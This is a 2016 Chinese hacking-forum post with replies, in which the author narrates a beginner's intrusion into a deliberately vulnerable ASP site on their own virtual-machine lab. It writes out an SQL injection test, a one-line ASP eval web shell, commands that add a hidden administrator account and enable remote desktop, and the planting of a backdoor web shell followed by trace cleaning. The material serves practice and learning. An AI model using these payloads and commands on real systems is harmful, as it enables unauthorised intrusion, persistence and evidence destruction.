查看: 27018|回复: 14

通过虚拟机搭建测试环境的简单入侵

[复制链接]
发表于 2016-6-2 10:47:16 | 显示全部楼层 |阅读模式
本帖最后由 薯片 于 2016-6-2 10:47 编辑

本文章仅供菜鸟参考,大神勿喷~



之前过论坛共享里下载过那个渗透系统,这回终于派上用场了!到网上下载了一个源码,然后自己搭建了一个局域网,通过主机访问虚拟机里的网页,这个大家应该都会,这里就不再叙述了,(为了方便我采用的“超级小旋风”ASP服务器软件)配置了很久时间,终于ping通了虚拟机:Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Users\Administrator>ping 192.168.0.11
正在 Ping 192.168.0.11 具有 32 字节的数据:
来自 192.168.0.11 的回复: 字节=32 时间<1ms TTL=128
来自 192.168.0.11 的回复: 字节=32 时间<1ms TTL=128
来自 192.168.0.11 的回复: 字节=32 时间<1ms TTL=128
来自 192.168.0.11 的回复: 字节=32 时间<1ms TTL=128

192.168.0.11 的 Ping 统计信息:
    数据包: 已发送 = 4,已接收 = 4,丢失 = 0 (0% 丢失),
往返行程的估计时间(以毫秒为单位):
    最短 = 0ms,最长 = 0ms,平均 = 0ms
C:\Users\Administrator>

额,不知道咋地了,截屏出现了问题,只能用系统自带的快捷键截屏了。。。。。。

Ok这样好像就表示搭建成功了,我用的是“三峡在线”的源码,因为这个源码可以说是漏洞百出,如果把里面的漏洞修补一遍的话,道不如重新写一个,所以作为菜鸟的我就拿来练手了。Ok,废话不多说,直接动手!
随便点击一个链接,在地址栏可以看到:asp?id= 这种类型的字符串,根据感觉来看,很有可能出现注入漏洞:
然后采用比较老套的手工注入测试,输入 and 1=1 后页面正常显示,输入 and 1=2 后就报错了,可以肯定,这个页面一定存在注入漏洞!
额,手工挨个检测费时又费力,直接上工具!不知道咋地了,把工具包移动到win7系统后很多软件不能用了,明小子就光荣下岗了,没办法只能用老掉牙的“”啊D“”好了,自我感觉明小子好用一些。

切换到SQL注入检测页面,把刚才页面http://192.168.0.11/news/view.asp?id=150复制到里面然后回车,检测出来是access数据库,然后检测这个过程就不详细说了。。
扫描出来:
啊D注入工具http://www.d99net.net
-------------------------------------
检测的表段:[admin]
----------------------------------------
[user] : admin  [pwd] :admin  
[user] : sxzx.net [pwd] : sxzx.net  

额,没加密,好吧直接扫后台登录。。。

在系统设置页面插入一句话木马:"%><%eval request("sb")%><%'"  ,然后架出菜刀。链接配置页面:http://192.168.0.11/inc/setup.asp密码是:sb
链接成功,然后可以上传一个大马,留下后门,以便以后再来。。(神经病,自己在自己电脑留后门,,,)然后上传了一个ASP大马,密码:ihonker
麻蛋,这都不行!那就先用菜刀的终端功能添加个管理员~
运行net user $abc 123 /add添加个隐藏账号,然后运行:netlocalgroup administrators $abc /add 提升为管理权限。
也不知道红盟提供的这个系统开3389了没有,先连一下试试。
没有开放,那就用一段命令:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal""Server/vfDenyTSConnection /t REG_DWORD /d 0 /f
尝试开启3389.


然后,又失败了,再想想其他办法。找到工具包里的:双开3389工具,切换到c盘根目录下,上传这些东西。然后再切换到虚拟终端运行: Tasklist/SVC>>c:\3389.txt,哈哈,搞定!,用3389桌面连接工具连接,输入用户名:$abc 密码:123 登录。
成功拿下服务器,因为是用虚拟机搭建的局域网,所以没有经过路由器,所以上传东西不用做映射,直接用菜刀上传就好。

然后直接上传擦除工具到d盘,通过远程桌面操作。
然后这时候再回过头来留个后门,总感觉这步晚了点。将大马改成后缀为.zip文件。同样通过菜刀上传到d盘,然后在远程桌面里把他剪切到网站目录下,然后改文件名为x_x.asp额,虽然这样好像不起什么作用,但改成这样舒服些,输入地址:http://192.168.0.11/x_x.asp密码:ihonker登录,成功添加后门。
然后再清理一下痕迹。
到这就完成了,整个入侵的过程也是特别基础,并且是本地搭建的,小白们可以借鉴一下。





----薯片


回复

使用道具 举报

 楼主| 发表于 2016-6-2 11:23:38 来自手机 | 显示全部楼层
手机版看不到图片,可以切换到pc版。
回复 支持 反对

使用道具 举报

发表于 2016-6-2 12:18:38 | 显示全部楼层
图都转绿了

点评

啊?什么转绿了,这是我前天晚上写的,  详情 回复 发表于 2016-6-2 13:05
回复 支持 反对

使用道具 举报

发表于 2016-6-2 12:37:37 | 显示全部楼层
每当我看到你们用啊D 明小子这类东西,总会有一种深深的自责……

点评

然而我是用sqlmap  详情 回复 发表于 2016-8-19 11:33
我也感觉好羞耻,所以我要继续学习新技术。  详情 回复 发表于 2016-6-2 13:04
回复 支持 反对

使用道具 举报

 楼主| 发表于 2016-6-2 12:57:52 来自手机 | 显示全部楼层
90_ 发表于 2016-6-2 12:37
每当我看到你们用啊D 明小子这类东西,总会有一种深深的自责……

回复 支持 反对

使用道具 举报

 楼主| 发表于 2016-6-2 13:00:26 来自手机 | 显示全部楼层
90_ 发表于 2016-6-2 12:37
每当我看到你们用啊D 明小子这类东西,总会有一种深深的自责……

回复 支持 反对

使用道具 举报

 楼主| 发表于 2016-6-2 13:04:17 | 显示全部楼层

RE: 通过虚拟机搭建测试环境的简单入侵

90_ 发表于 2016-6-2 12:37
每当我看到你们用啊D 明小子这类东西,总会有一种深深的自责……

我也感觉好羞耻,所以我要继续学习新技术。
回复 支持 反对

使用道具 举报

 楼主| 发表于 2016-6-2 13:05:51 | 显示全部楼层

RE: 通过虚拟机搭建测试环境的简单入侵


啊?什么转绿了,这是我前天晚上写的,
回复 支持 反对

使用道具 举报

发表于 2016-6-4 23:17:22 | 显示全部楼层
为什么图加载不出来?

点评

切换到pc版就可以了,  详情 回复 发表于 2016-6-6 03:37
回复 支持 反对

使用道具 举报

 楼主| 发表于 2016-6-6 03:37:58 来自手机 | 显示全部楼层
周翔宇 发表于 2016-6-4 23:17
为什么图加载不出来?

切换到pc版就可以了,
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-9 23:02 , Processed in 0.033689 second(s), 10 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部